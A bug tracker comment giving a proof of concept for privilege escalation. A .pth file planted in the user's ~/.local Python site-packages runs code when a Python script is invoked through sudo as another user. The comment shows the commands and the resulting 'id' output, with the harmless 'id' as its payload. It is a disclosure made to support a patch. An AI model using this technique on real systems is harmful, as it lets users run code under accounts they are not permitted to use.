Comment 4 for bug 1556302

Simon Arlott (sa.me.uk) wrote :

Proof of concept:
/etc/sudoers contains:
%dns_simon ALL=(dns_zonefiles) NOPASSWD: /home/dns/zonefiles/bin/dns-reload simon

Prepare python code to run automatically as the calling user:
$ mkdir -p "$HOME/.local/lib/python3.5/site-packages/exploit"
$ echo "import subprocess" > "$HOME/.local/lib/python3.5/site-packages/exploit/__init__.py"
$ echo "subprocess.run(['id'])" >> "$HOME/.local/lib/python3.5/site-packages/exploit/__init__.py"
$ echo "import exploit" > "$HOME/.local/lib/python3.5/site-packages/exploit.pth"

Calling user credentials:
$ id
uid=1001(simon) gid=1001(simon) groups=1001(simon),100(users),1007(dns_simon)

Exploit script executing as called user credentials:
$ sudo -u dns_zonefiles /home/dns/zonefiles/bin/dns-reload simon
uid=999(dns_zonefiles) gid=995(dns_zonefiles) groups=995(dns_zonefiles)

Without the Ubuntu patch:
$ sudo -u dns_zonefiles /home/dns/zonefiles/bin/dns-reload simon
Processing example.com...